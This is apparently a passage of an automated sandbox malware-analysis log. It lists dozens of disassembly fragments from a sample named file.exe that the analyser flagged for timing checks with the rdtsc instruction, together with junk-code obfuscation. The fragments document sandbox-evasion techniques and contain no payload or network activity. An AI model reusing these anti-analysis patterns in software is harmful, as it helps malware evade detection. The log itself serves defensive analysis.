00007F9668C559DEh 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE950 second address: 11BEA03 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9668BCCCDEh 0x00000008 jmp 00007F9668BCCCD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F9668BCCCCEh 0x00000015 nop 0x00000016 mov ecx, dword ptr [ebp+122D3644h] 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1E0Ah], eax 0x00000024 push 4A054E08h 0x00000029 pushad 0x0000002a pushad 0x0000002b push eax 0x0000002c pop eax 0x0000002d jmp 00007F9668BCCCD0h 0x00000032 popad 0x00000033 js 00007F9668BCCCD5h 0x00000039 popad 0x0000003a xor dword ptr [esp], 4A054E88h 0x00000041 movsx edx, ax 0x00000044 push 00000003h 0x00000046 jmp 00007F9668BCCCCFh 0x0000004b mov cx, bx 0x0000004e push 00000000h 0x00000050 or dword ptr [ebp+122D270Bh], edx 0x00000056 push 00000003h 0x00000058 mov edi, dword ptr [ebp+122D35DCh] 0x0000005e mov dword ptr [ebp+122D1C1Fh], eax 0x00000064 push D52EB831h 0x00000069 push eax 0x0000006a push edx 0x0000006b push ebx 0x0000006c js 00007F9668BCCCC6h 0x00000072 pop ebx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEA03 second address: 11BEA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEA08 second address: 11BEA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 152EB831h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F9668BCCCC8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+124557BCh] 0x00000030 jmp 00007F9668BCCCD2h 0x00000035 push esi 0x00000036 mov edx, dword ptr [ebp+122D19FCh] 0x0000003c pop ecx 0x0000003d push eax 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9668BCCCD3h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEBFD second address: 11BEC03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BECD6 second address: 11BED05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, cx 0x0000000b mov dword ptr [ebp+122D34CDh], ebx 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D3718h] 0x00000019 push E669A1A9h 0x0000001e pushad 0x0000001f jc 00007F9668BCCCCCh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BED05 second address: 11BED09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFCAA second address: 11DFCD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F9668BCCCCEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F9668BCCCD2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE140 second address: 11DE160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9668C559DBh 0x0000000c jmp 00007F9668C559DEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE160 second address: 11DE164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE529 second address: 11DE533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9668C559D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE533 second address: 11DE537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE537 second address: 11DE543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9668C559D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE543 second address: 11DE549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE549 second address: 11DE54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DE6EE second address: 11DE6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEB45 second address: 11DEB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9668C559D6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEB66 second address: 11DEB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF3F7 second address: 11DF438 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9668C559D6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9668C559E7h 0x00000016 jmp 00007F9668C559E9h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF438 second address: 11DF442 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6C4 second address: 11DF6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6C8 second address: 11DF6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6D0 second address: 11DF6F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F9668C559D6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F9668C559D6h 0x00000012 jmp 00007F9668C559DFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6F1 second address: 11DF6F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFADB second address: 11DFAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFAE4 second address: 11DFAEE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9668BCCCDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3650 second address: 11E3671 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F9668C559E4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3671 second address: 11E3675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24CD second address: 11E24DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24DE second address: 11E24E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9668BCCCC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24E8 second address: 11E24FF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668C559D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F9668C559D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24FF second address: 11E2505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB65F second address: 11EB685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9668C559DCh 0x0000000b jns 00007F9668C559D6h 0x00000011 jmp 00007F9668C559DDh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAC74 second address: 11EAC79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAC79 second address: 11EAC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559DBh 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAC90 second address: 11EAC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAFBE second address: 11EAFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAFC2 second address: 11EAFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F9668BCCCC6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB289 second address: 11EB28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED3E6 second address: 11ED3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED3EB second address: 11ED3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED3F2 second address: 11ED402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED5B2 second address: 11ED5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED5B8 second address: 11ED5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED5BC second address: 11ED5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED96E second address: 11ED974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED974 second address: 11ED978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE47 second address: 11EDE62 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9668BCCCCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F9668BCCCC8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE62 second address: 11EDEA3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9668C559D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F9668C559D8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, ecx 0x00000029 push eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F9668C559DFh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDF4F second address: 11EDF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDF61 second address: 11EDF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE160 second address: 11EE164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE80A second address: 11EE80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF2EB second address: 11EF314 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9668BCCCCCh 0x00000008 je 00007F9668BCCCC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 jmp 00007F9668BCCCD1h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F022E second address: 11F0232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0232 second address: 11F0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0238 second address: 11F025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F186E second address: 11F188A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F9668BCCCD6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0B91 second address: 11F0B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2DB3 second address: 11F2DBD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2DBD second address: 11F2DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2DC3 second address: 11F2DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F373C second address: 11F3741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3741 second address: 11F37A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d mov esi, dword ptr [ebp+122D28BBh] 0x00000013 mov dword ptr [ebp+1246FB1Fh], edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F9668BCCCC8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov esi, 18D37B59h 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c pushad 0x0000003d jmp 00007F9668BCCCD4h 0x00000042 push edi 0x00000043 pop edi 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F37A2 second address: 11F37A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F790A second address: 11F7962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b mov bx, 31DFh 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx edi, si 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F9668BCCCC8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov ebx, eax 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 jmp 00007F9668BCCCD7h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3501 second address: 11F3505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3FDF second address: 11F3FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7962 second address: 11F7966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3FE5 second address: 11F3FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F8909 second address: 11F890F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA895 second address: 11FA8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, si 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+1247BCC8h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F9668BCCCC8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jng 00007F9668BCCCC8h 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA8D2 second address: 11FA8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB8E6 second address: 11FB962 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F9668BCCCCFh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F9668BCCCC8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F9668BCCCC8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 sub di, 755Bh 0x0000004d sub dword ptr [ebp+1247E199h], edx 0x00000053 xor edi, dword ptr [ebp+122D3744h] 0x00000059 push 00000000h 0x0000005b mov di, 6E4Ch 0x0000005f xchg eax, esi 0x00000060 push esi 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB962 second address: 11FB968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FCA9D second address: 11FCAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F9668BCCCC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA24 second address: 11FDA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12016A9 second address: 1201727 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 jmp 00007F9668BCCCD5h 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9668BCCCC8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F9668BCCCC8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 sub dword ptr [ebp+122D29B7h], eax 0x0000004b push 00000000h 0x0000004d sub ebx, dword ptr [ebp+122D3750h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F9668BCCCD1h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201727 second address: 1201731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9668C559D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201731 second address: 1201735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120072F second address: 1200735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120185E second address: 1201867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202836 second address: 120283C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200735 second address: 120073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
